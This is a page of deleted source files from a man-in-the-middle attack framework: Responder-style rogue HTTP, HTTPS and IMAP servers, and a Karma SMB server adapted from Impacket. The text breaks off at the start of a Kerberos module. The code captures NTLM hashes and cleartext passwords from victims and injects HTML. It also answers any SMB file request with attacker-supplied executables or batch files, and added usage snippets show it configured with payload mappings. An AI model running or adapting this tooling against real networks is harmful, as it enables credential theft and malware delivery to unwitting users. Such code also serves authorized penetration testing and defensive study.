Buffer = ServeHtmlFile(Payload = ServeFile(filename))
Buffer.calculate()
log.info("{} [HTTP] Sending file {}".format(filename, client))
return str(Buffer)
def GrabURL(data, host):
GET = re.findall('(?<=GET )[^HTTP]*', data)
POST = re.findall('(?<=POST )[^HTTP]*', data)
POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data)
if GET:
req = ''.join(GET).strip()
log.info("[HTTP] {} - - GET '{}'".format(host, req))
return req
if POST:
req = ''.join(POST).strip()
log.info("[HTTP] {} - - POST '{}'".format(host, req))
if len(''.join(POSTDATA)) > 2:
log.info("[HTTP] POST Data: {}".format(''.join(POSTDATA).strip()))
return req
# Handle HTTP packet sequence.
def PacketSequence(data, client):
NTLM_Auth = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
Basic_Auth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
# Serve the .exe if needed
if settings.Config.Serve_Always == True or (settings.Config.Serve_Exe == True and re.findall('.exe', data)):
return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)
# Serve the custom HTML if needed
if settings.Config.Serve_Html == True:
return RespondWithFile(client, settings.Config.Html_Filename)
WPAD_Custom = WpadCustom(data, client)
if NTLM_Auth:
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01":
GrabURL(data, client)
GrabHost(data, client)
GrabCookie(data, client)
Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
Buffer.calculate()
Buffer_Ans = IIS_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(Buffer))
return str(Buffer_Ans)
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Auth))
ParseHTTPHash(NTLM_Auth, client)
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
log.info("{} [HTTP] WPAD (auth) file sent".format(client))
return WPAD_Custom
else:
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
Buffer.calculate()
return str(Buffer)
elif Basic_Auth:
ClearText_Auth = b64decode(''.join(Basic_Auth))
GrabURL(data, client)
GrabHost(data, client)
GrabCookie(data, client)
SaveToDb({
'module': 'HTTP',
'type': 'Basic',
'client': client,
'user': ClearText_Auth.split(':')[0],
'cleartext': ClearText_Auth.split(':')[1],
})
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
if settings.Config.Verbose:
log.info("{} [HTTP] Sent WPAD (auth) file" .format(client))
return WPAD_Custom
else:
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
Buffer.calculate()
return str(Buffer)
else:
if settings.Config.Basic == True:
Response = IIS_Basic_401_Ans()
if settings.Config.Verbose:
log.info("{} [HTTP] Sending BASIC authentication request".format(client))
else:
Response = IIS_Auth_401_Ans()
if settings.Config.Verbose:
log.info("{} [HTTP] Sending NTLM authentication request".format(client))
return str(Response)
# HTTP Server class
class HTTP1(BaseRequestHandler):
def handle(self):
try:
while True:
self.request.settimeout(1)
data = self.request.recv(8092)
req_url = GrabURL(data, self.client_address[0])
Buffer = WpadCustom(data, self.client_address[0])
if Buffer and settings.Config.Force_WPAD_Auth == False:
self.request.send(Buffer)
if settings.Config.Verbose:
log.info("{} [HTTP] Sent WPAD (no auth) file".format(self.client_address[0]))
if (req_url is not None) and (req_url.strip() in HTTP.endpoints):
resp = HTTP.endpoints[req_url.strip()]
self.request.send(str(resp))
if (req_url is not None) and (req_url.strip() in HTTP.static_endpoints):
path = HTTP.static_endpoints[req_url.strip()]['path']
Buffer = HTTP.static_endpoints[req_url.strip()]['buffer']
with open(path, 'r') as file:
Buffer.fields['Payload'] = file.read()
Buffer.calculate()
self.request.send(str(Buffer))
else:
Buffer = PacketSequence(data,self.client_address[0])
self.request.send(Buffer)
except socket.error:
pass
# HTTPS Server class
class HTTPS(StreamRequestHandler):
def setup(self):
self.exchange = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
def handle(self):
try:
while True:
data = self.exchange.recv(8092)
self.exchange.settimeout(0.5)
Buffer = WpadCustom(data,self.client_address[0])
if Buffer and settings.Config.Force_WPAD_Auth == False:
self.exchange.send(Buffer)
if settings.Config.Verbose:
log.info("{} [HTTPS] Sent WPAD (no auth) file".format(self.client_address[0]))
else:
Buffer = PacketSequence(data,self.client_address[0])
self.exchange.send(Buffer)
except:
pass
# SSL context handler
class SSLSock(ThreadingMixIn, TCPServer):
def __init__(self, server_address, RequestHandlerClass):
from OpenSSL import SSL
BaseServer.__init__(self, server_address, RequestHandlerClass)
ctx = SSL.Context(SSL.SSLv3_METHOD)
cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
ctx.use_privatekey_file(key)
ctx.use_certificate_file(cert)
self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
self.server_bind()
self.server_activate()
def shutdown_request(self,request):
try:
request.shutdown()
except:
pass
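A minimal usage sketch for the rogue HTTP server above (the import path and payload are assumptions; binding port 80 requires root, and core.responder.settings must already be initialized by the framework):
from core.responder.HTTP import HTTP   # assumed import path for this file

# Register an in-memory endpoint served at /update.html, then start the server.
HTTP.add_endpoint('update.html', 'text/html', '<html><body>test</body></html>')
HTTP().start()                          # serves from a daemon thread on 0.0.0.0:80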

View file

@ -1,84 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import core.responder.settings as settings
import threading
from traceback import print_exc
from core.responder.utils import *
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd
class IMAP:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 143), IMAP4)
else:
server = ThreadingTCPServer(('', 143), IMAP4)
t = threading.Thread(name='IMAP', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting IMAP server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# IMAP4 Server class
class IMAP4(BaseRequestHandler):
def handle(self):
try:
self.request.send(str(IMAPGreeting()))
data = self.request.recv(1024)
if data[5:15] == "CAPABILITY":
RequestTag = data[0:4]
self.request.send(str(IMAPCapability()))
self.request.send(str(IMAPCapabilityEnd(Tag=RequestTag)))
data = self.request.recv(1024)
if data[5:10] == "LOGIN":
Credentials = data[10:].strip().split()  # "LOGIN user pass" -> [user, pass]
SaveToDb({
'module': 'IMAP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': Credentials[0],
'cleartext': Credentials[1],
'fullhash': Credentials[0]+":"+Credentials[1],
})
## FIXME: Close connection properly
## self.request.send(str(ditchthisconnection()))
## data = self.request.recv(1024)
except Exception:
pass

View file

@ -1,579 +0,0 @@
#!/usr/bin/python
# Copyright (c) 2015 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Karma SMB
#
# Author:
# Alberto Solino (@agsolino)
# Original idea by @mubix
#
# Description:
# The idea of this script is to answer any file read request
# with a set of predefined contents based on the extension
# asked, regardless of the sharename and/or path.
# When executing this script without a config file, the contents of the
# file given as the pathname argument will be sent for every request.
# If a config file is specified, its format should be:
# <extension> = <pathname>
# for example:
# bat = /tmp/batchfile
# com = /tmp/comfile
# exe = /tmp/exefile
#
# The SMB2 support works with a caveat. If two different
# filenames at the same share are requested, the first
# one will work and the second one will not work if the request
# is performed right away. This seems related to the
# QUERY_DIRECTORY request, where we return the files available.
# In the first try, we return the file that was asked to open.
# In the second try, the client will NOT ask for another
# QUERY_DIRECTORY but will use the cached one. This time the new file
# is not there, so the client assumes it doesn't exist.
# After a few seconds, it looks like the client cache is cleared and
# the operation works again. Further research is needed to keep this
# from happening.
#
# SMB1 seems to be working fine on that scenario.
#
# ToDo:
# [ ] A lot of testing needed under different OSes.
# I'm still not sure how reliable this approach is.
# [ ] Add support for other SMB read commands. Right now just
# covering SMB_COM_NT_CREATE_ANDX
# [ ] Disable write request, now if the client tries to copy
# a file back to us, it will overwrite the files we're
# hosting. *CAREFUL!!!*
#
import sys
import os
import argparse
import logging
import ntpath
import ConfigParser
from threading import Thread
from mitmflib.impacket.examples import logger
from mitmflib.impacket import smbserver, smb, version
import mitmflib.impacket.smb3structs as smb2
from mitmflib.impacket.smb import FILE_OVERWRITE, FILE_OVERWRITE_IF, FILE_WRITE_DATA, FILE_APPEND_DATA, GENERIC_WRITE
from mitmflib.impacket.nt_errors import STATUS_USER_SESSION_DELETED, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NO_MORE_FILES, \
STATUS_OBJECT_PATH_NOT_FOUND
from mitmflib.impacket.smbserver import SRVSServer, decodeSMBString, findFirst2, STATUS_SMB_BAD_TID, encodeSMBString, \
getFileTime, queryPathInformation
class KarmaSMBServer(Thread):
def __init__(self, smb_challenge, smb_port, smb2Support = False):
Thread.__init__(self)
self.server = 0
self.defaultFile = None
self.extensions = {}
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global', 'challenge', smb_challenge.decode('hex'))
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','Logon server share')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
# NETLOGON always needed
smbConfig.add_section('NETLOGON')
smbConfig.set('NETLOGON','comment','Logon server share')
smbConfig.set('NETLOGON','read only','no')
smbConfig.set('NETLOGON','share type','0')
smbConfig.set('NETLOGON','path','')
# SYSVOL always needed
smbConfig.add_section('SYSVOL')
smbConfig.set('SYSVOL','comment','')
smbConfig.set('SYSVOL','read only','no')
smbConfig.set('SYSVOL','share type','0')
smbConfig.set('SYSVOL','path','')
if smb2Support:
smbConfig.set("global", "SMB2Support", "True")
self.server = smbserver.SMBSERVER(('0.0.0.0', int(smb_port)), config_parser = smbConfig)
self.server.processConfigFile()
# Unregistering some dangerous and unwanted commands
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_CREATE_DIRECTORY)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE_DIRECTORY)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_RENAME)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE_ANDX)
self.server.unregisterSmb2Command(smb2.SMB2_WRITE)
self.origsmbComNtCreateAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX, self.smbComNtCreateAndX)
self.origsmbComTreeConnectAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX, self.smbComTreeConnectAndX)
self.origQueryPathInformation = self.server.hookTransaction2(smb.SMB.TRANS2_QUERY_PATH_INFORMATION, self.queryPathInformation)
self.origFindFirst2 = self.server.hookTransaction2(smb.SMB.TRANS2_FIND_FIRST2, self.findFirst2)
# And the same for SMB2
self.origsmb2TreeConnect = self.server.hookSmb2Command(smb2.SMB2_TREE_CONNECT, self.smb2TreeConnect)
self.origsmb2Create = self.server.hookSmb2Command(smb2.SMB2_CREATE, self.smb2Create)
self.origsmb2QueryDirectory = self.server.hookSmb2Command(smb2.SMB2_QUERY_DIRECTORY, self.smb2QueryDirectory)
self.origsmb2Read = self.server.hookSmb2Command(smb2.SMB2_READ, self.smb2Read)
self.origsmb2Close = self.server.hookSmb2Command(smb2.SMB2_CLOSE, self.smb2Close)
# Now we have to register the MS-SRVS server. This is especially important for
# Windows 7+ and Mavericks clients since they WON'T (especially OSX)
# ask for shares using MS-RAP.
self.__srvsServer = SRVSServer()
self.__srvsServer.daemon = True
self.server.registerNamedPipe('srvsvc',('127.0.0.1',self.__srvsServer.getListenPort()))
def findFirst2(self, connId, smbServer, recvPacket, parameters, data, maxDataCount):
connData = smbServer.getConnectionData(connId)
respSetup = ''
respParameters = ''
respData = ''
findFirst2Parameters = smb.SMBFindFirst2_Parameters( recvPacket['Flags2'], data = parameters)
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],findFirst2Parameters['FileName']).replace('\\','/'))
origFileName = os.path.basename(origPathName)
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
if connData['ConnectedShares'].has_key(recvPacket['Tid']):
path = connData['ConnectedShares'][recvPacket['Tid']]['path']
# 2. We call the normal findFirst2 call, but with our targetFile
searchResult, searchCount, errorCode = findFirst2(path,
targetFile,
findFirst2Parameters['InformationLevel'],
findFirst2Parameters['SearchAttributes'] )
respParameters = smb.SMBFindFirst2Response_Parameters()
endOfSearch = 1
sid = 0x80 # default SID
searchCount = 0
totalData = 0
for i in enumerate(searchResult):
#i[1].dump()
try:
# 3. And we restore the original filename requested ;)
i[1]['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = origFileName)
except:
pass
data = i[1].getData()
lenData = len(data)
if (totalData+lenData) >= maxDataCount or (i[0]+1) > findFirst2Parameters['SearchCount']:
# We gotta stop here and continue on a find_next2
endOfSearch = 0
# Simple way to generate a fid
if len(connData['SIDs']) == 0:
sid = 1
else:
sid = connData['SIDs'].keys()[-1] + 1
# Store the remaining search results in the ConnData SID
connData['SIDs'][sid] = searchResult[i[0]:]
respParameters['LastNameOffset'] = totalData
break
else:
searchCount +=1
respData += data
totalData += lenData
respParameters['SID'] = sid
respParameters['EndOfSearch'] = endOfSearch
respParameters['SearchCount'] = searchCount
else:
errorCode = STATUS_SMB_BAD_TID
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
def smbComNtCreateAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId)
ntCreateAndXParameters = smb.SMBNtCreateAndX_Parameters(SMBCommand['Parameters'])
ntCreateAndXData = smb.SMBNtCreateAndX_Data( flags = recvPacket['Flags2'], data = SMBCommand['Data'])
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)
#ntCreateAndXParameters.dump()
# Let's try to avoid allowing write requests from the client back to us
# not 100% bulletproof, plus also the client might be using other SMB
# calls (e.g. SMB_COM_WRITE)
createOptions = ntCreateAndXParameters['CreateOptions']
if createOptions & smb.FILE_DELETE_ON_CLOSE == smb.FILE_DELETE_ON_CLOSE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE == FILE_OVERWRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE_IF == FILE_OVERWRITE_IF:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.FILE_WRITE_DATA == FILE_WRITE_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.FILE_APPEND_DATA == FILE_APPEND_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.GENERIC_WRITE == GENERIC_WRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & 0x10000 == 0x10000:
errorCode = STATUS_ACCESS_DENIED
else:
errorCode = STATUS_SUCCESS
if errorCode == STATUS_ACCESS_DENIED:
return [respSMBCommand], None, errorCode
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],ntCreateAndXData['FileName']).replace('\\','/'))
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
# 2. We change the filename in the request for our targetFile
ntCreateAndXData['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = targetFile)
SMBCommand['Data'] = str(ntCreateAndXData)
smbServer.log("%s is asking for %s. Delivering %s" % (connData['ClientIP'], origPathName,targetFile),logging.INFO)
# 3. We call the original call with our modified data
return self.origsmbComNtCreateAndX(connId, smbServer, SMBCommand, recvPacket)
def queryPathInformation(self, connId, smbServer, recvPacket, parameters, data, maxDataCount = 0):
# The trick we play here is that Windows clients first ask for the file
# and then it asks for the directory containing the file.
# It is important to answer the right questions for the attack to work
connData = smbServer.getConnectionData(connId)
respSetup = ''
respParameters = ''
respData = ''
errorCode = 0
queryPathInfoParameters = smb.SMBQueryPathInformation_Parameters(flags = recvPacket['Flags2'], data = parameters)
if connData['ConnectedShares'].has_key(recvPacket['Tid']):
path = ''
try:
origPathName = decodeSMBString(recvPacket['Flags2'], queryPathInfoParameters['FileName'])
origPathName = os.path.normpath(origPathName.replace('\\','/'))
if connData.has_key('MS15011') is False:
connData['MS15011'] = {}
smbServer.log("Client is asking for QueryPathInformation for: %s" % origPathName,logging.INFO)
if connData['MS15011'].has_key(origPathName) or origPathName == '.':
# We already processed this entry, now it's asking for a directory
infoRecord, errorCode = queryPathInformation(path, '/', queryPathInfoParameters['InformationLevel'])
else:
# First time asked, asking for the file
infoRecord, errorCode = queryPathInformation(path, self.defaultFile, queryPathInfoParameters['InformationLevel'])
connData['MS15011'][os.path.dirname(origPathName)] = infoRecord
except Exception, e:
#import traceback
#traceback.print_exc()
smbServer.log("queryPathInformation: %s" % e,logging.ERROR)
if infoRecord is not None:
respParameters = smb.SMBQueryPathInformationResponse_Parameters()
respData = infoRecord
else:
errorCode = STATUS_SMB_BAD_TID
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
def smb2Read(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
connData['MS15011']['StopConnection'] = True
smbServer.setConnectionData(connId, connData)
return self.origsmb2Read(connId, smbServer, recvPacket)
def smb2Close(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
# We're closing the connection trying to flush the client's
# cache.
if connData['MS15011']['StopConnection'] is True:
return [smb2.SMB2Error()], None, STATUS_USER_SESSION_DELETED
return self.origsmb2Close(connId, smbServer, recvPacket)
def smb2Create(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
ntCreateRequest = smb2.SMB2Create(recvPacket['Data'])
# Let's try to avoid allowing write requests from the client back to us
# not 100% bulletproof, plus also the client might be using other SMB
# calls
createOptions = ntCreateRequest['CreateOptions']
if createOptions & smb2.FILE_DELETE_ON_CLOSE == smb2.FILE_DELETE_ON_CLOSE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE == smb2.FILE_OVERWRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE_IF == smb2.FILE_OVERWRITE_IF:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.FILE_WRITE_DATA == smb2.FILE_WRITE_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.FILE_APPEND_DATA == smb2.FILE_APPEND_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.GENERIC_WRITE == smb2.GENERIC_WRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & 0x10000 == 0x10000:
errorCode = STATUS_ACCESS_DENIED
else:
errorCode = STATUS_SUCCESS
if errorCode == STATUS_ACCESS_DENIED:
return [smb2.SMB2Error()], None, errorCode
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(ntCreateRequest['Buffer'][:ntCreateRequest['NameLength']].decode('utf-16le').replace('\\','/'))
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
# Are we being asked for a directory?
if (createOptions & smb2.FILE_DIRECTORY_FILE) == 0:
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
connData['MS15011']['FileData'] = (os.path.basename(origPathName), targetFile)
smbServer.log("%s is asking for %s. Delivering %s" % (connData['ClientIP'], origPathName,targetFile),logging.INFO)
else:
targetFile = '/'
# 2. We change the filename in the request for our targetFile
ntCreateRequest['Buffer'] = targetFile.encode('utf-16le')
ntCreateRequest['NameLength'] = len(targetFile)*2
recvPacket['Data'] = str(ntCreateRequest)
# 3. We call the original call with our modified data
return self.origsmb2Create(connId, smbServer, recvPacket)
def smb2QueryDirectory(self, connId, smbServer, recvPacket):
# Windows clients with SMB2 will also perform a QueryDirectory
# expecting to get the filename asked. So we deliver it :)
connData = smbServer.getConnectionData(connId)
respSMBCommand = smb2.SMB2QueryDirectory_Response()
#queryDirectoryRequest = smb2.SMB2QueryDirectory(recvPacket['Data'])
errorCode = 0xff
respSMBCommand['Buffer'] = '\x00'
errorCode = STATUS_SUCCESS
#if (queryDirectoryRequest['Flags'] & smb2.SL_RETURN_SINGLE_ENTRY) == 0:
# return [smb2.SMB2Error()], None, STATUS_NOT_SUPPORTED
if connData['MS15011']['FindDone'] is True:
connData['MS15011']['FindDone'] = False
smbServer.setConnectionData(connId, connData)
return [smb2.SMB2Error()], None, STATUS_NO_MORE_FILES
else:
origName, targetFile = connData['MS15011']['FileData']
(mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(targetFile)
infoRecord = smb.SMBFindFileIdBothDirectoryInfo( smb.SMB.FLAGS2_UNICODE )
infoRecord['ExtFileAttributes'] = smb.ATTR_NORMAL | smb.ATTR_ARCHIVE
infoRecord['EaSize'] = 0
infoRecord['EndOfFile'] = size
infoRecord['AllocationSize'] = size
infoRecord['CreationTime'] = getFileTime(ctime)
infoRecord['LastAccessTime'] = getFileTime(atime)
infoRecord['LastWriteTime'] = getFileTime(mtime)
infoRecord['LastChangeTime'] = getFileTime(mtime)
infoRecord['ShortName'] = '\x00'*24
#infoRecord['FileName'] = os.path.basename(origName).encode('utf-16le')
infoRecord['FileName'] = origName.encode('utf-16le')
padLen = (8-(len(infoRecord) % 8)) % 8
infoRecord['NextEntryOffset'] = 0
respSMBCommand['OutputBufferOffset'] = 0x48
respSMBCommand['OutputBufferLength'] = len(infoRecord.getData())
respSMBCommand['Buffer'] = infoRecord.getData() + '\xaa'*padLen
connData['MS15011']['FindDone'] = True
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def smb2TreeConnect(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
respPacket = smb2.SMB2Packet()
respPacket['Flags'] = smb2.SMB2_FLAGS_SERVER_TO_REDIR
respPacket['Status'] = STATUS_SUCCESS
respPacket['CreditRequestResponse'] = 1
respPacket['Command'] = recvPacket['Command']
respPacket['SessionID'] = connData['Uid']
respPacket['Reserved'] = recvPacket['Reserved']
respPacket['MessageID'] = recvPacket['MessageID']
respPacket['TreeID'] = recvPacket['TreeID']
respSMBCommand = smb2.SMB2TreeConnect_Response()
treeConnectRequest = smb2.SMB2TreeConnect(recvPacket['Data'])
errorCode = STATUS_SUCCESS
## Process here the request, does the share exist?
path = str(recvPacket)[treeConnectRequest['PathOffset']:][:treeConnectRequest['PathLength']]
UNCOrShare = path.decode('utf-16le')
# Is this a UNC?
if ntpath.ismount(UNCOrShare):
path = UNCOrShare.split('\\')[3]
else:
path = ntpath.basename(UNCOrShare)
# We won't search for the share.. all of them exist :P
#share = searchShare(connId, path.upper(), smbServer)
connData['MS15011'] = {}
connData['MS15011']['FindDone'] = False
connData['MS15011']['StopConnection'] = False
share = {}
if share is not None:
# Simple way to generate a Tid
if len(connData['ConnectedShares']) == 0:
tid = 1
else:
tid = connData['ConnectedShares'].keys()[-1] + 1
connData['ConnectedShares'][tid] = share
connData['ConnectedShares'][tid]['path'] = '/'
connData['ConnectedShares'][tid]['shareName'] = path
respPacket['TreeID'] = tid
#smbServer.log("Connecting Share(%d:%s)" % (tid,path))
else:
smbServer.log("SMB2_TREE_CONNECT not found %s" % path, logging.ERROR)
errorCode = STATUS_OBJECT_PATH_NOT_FOUND
respPacket['Status'] = errorCode
##
if path == 'IPC$':
respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_PIPE
respSMBCommand['ShareFlags'] = 0x30
else:
respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_DISK
respSMBCommand['ShareFlags'] = 0x0
respSMBCommand['Capabilities'] = 0
respSMBCommand['MaximalAccess'] = 0x011f01ff
respPacket['Data'] = respSMBCommand
smbServer.setConnectionData(connId, connData)
return None, [respPacket], errorCode
def smbComTreeConnectAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId)
resp = smb.NewSMBPacket()
resp['Flags1'] = smb.SMB.FLAGS1_REPLY
resp['Flags2'] = smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES | recvPacket['Flags2'] & smb.SMB.FLAGS2_UNICODE
resp['Tid'] = recvPacket['Tid']
resp['Mid'] = recvPacket['Mid']
resp['Pid'] = connData['Pid']
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX)
respParameters = smb.SMBTreeConnectAndXResponse_Parameters()
respData = smb.SMBTreeConnectAndXResponse_Data()
treeConnectAndXParameters = smb.SMBTreeConnectAndX_Parameters(SMBCommand['Parameters'])
if treeConnectAndXParameters['Flags'] & 0x8:
respParameters = smb.SMBTreeConnectAndXExtendedResponse_Parameters()
treeConnectAndXData = smb.SMBTreeConnectAndX_Data( flags = recvPacket['Flags2'] )
treeConnectAndXData['_PasswordLength'] = treeConnectAndXParameters['PasswordLength']
treeConnectAndXData.fromString(SMBCommand['Data'])
errorCode = STATUS_SUCCESS
UNCOrShare = decodeSMBString(recvPacket['Flags2'], treeConnectAndXData['Path'])
# Is this a UNC?
if ntpath.ismount(UNCOrShare):
path = UNCOrShare.split('\\')[3]
else:
path = ntpath.basename(UNCOrShare)
# We won't search for the share.. all of them exist :P
smbServer.log("TreeConnectAndX request for %s" % path, logging.INFO)
#share = searchShare(connId, path, smbServer)
share = {}
# Simple way to generate a Tid
if len(connData['ConnectedShares']) == 0:
tid = 1
else:
tid = connData['ConnectedShares'].keys()[-1] + 1
connData['ConnectedShares'][tid] = share
connData['ConnectedShares'][tid]['path'] = '/'
connData['ConnectedShares'][tid]['shareName'] = path
resp['Tid'] = tid
#smbServer.log("Connecting Share(%d:%s)" % (tid,path))
respParameters['OptionalSupport'] = smb.SMB.SMB_SUPPORT_SEARCH_BITS
if path == 'IPC$':
respData['Service'] = 'IPC'
else:
respData['Service'] = path
respData['PadLen'] = 0
respData['NativeFileSystem'] = encodeSMBString(recvPacket['Flags2'], 'NTFS' )
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
resp['Uid'] = connData['Uid']
resp.addCommand(respSMBCommand)
smbServer.setConnectionData(connId, connData)
return None, [resp], errorCode
def start(self):
self.server.serve_forever()
def setDefaultFile(self, filename):
self.defaultFile = filename
def setExtensionsConfig(self, filename):
for line in filename.readlines():
line = line.strip('\r\n ')
if line.startswith('#') is not True and len(line) > 0:
extension, pathName = line.split('=')
self.extensions[extension.strip().upper()] = os.path.normpath(pathName.strip())
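A minimal usage sketch for KarmaSMBServer (the challenge value and paths are made up; note that start() is overridden above, so it blocks in serve_forever() rather than spawning a thread):
server = KarmaSMBServer('A1B2C3D4E5F6A7B8', 445, smb2Support=True)
server.setDefaultFile('/tmp/default.html')
# Same mapping the '<extension> = <pathname>' config file would produce:
server.extensions = {'EXE': '/tmp/payload.exe', 'BAT': '/tmp/payload.bat'}
server.start()   # blocks; run it from its own process or thread if needed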

View file

@ -1,204 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import struct
import core.responder.settings as settings
import threading
from traceback import print_exc
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer, UDPServer
from core.responder.utils import *
class Kerberos:
def start(self):
try:
if OsInterfaceIsSupported():
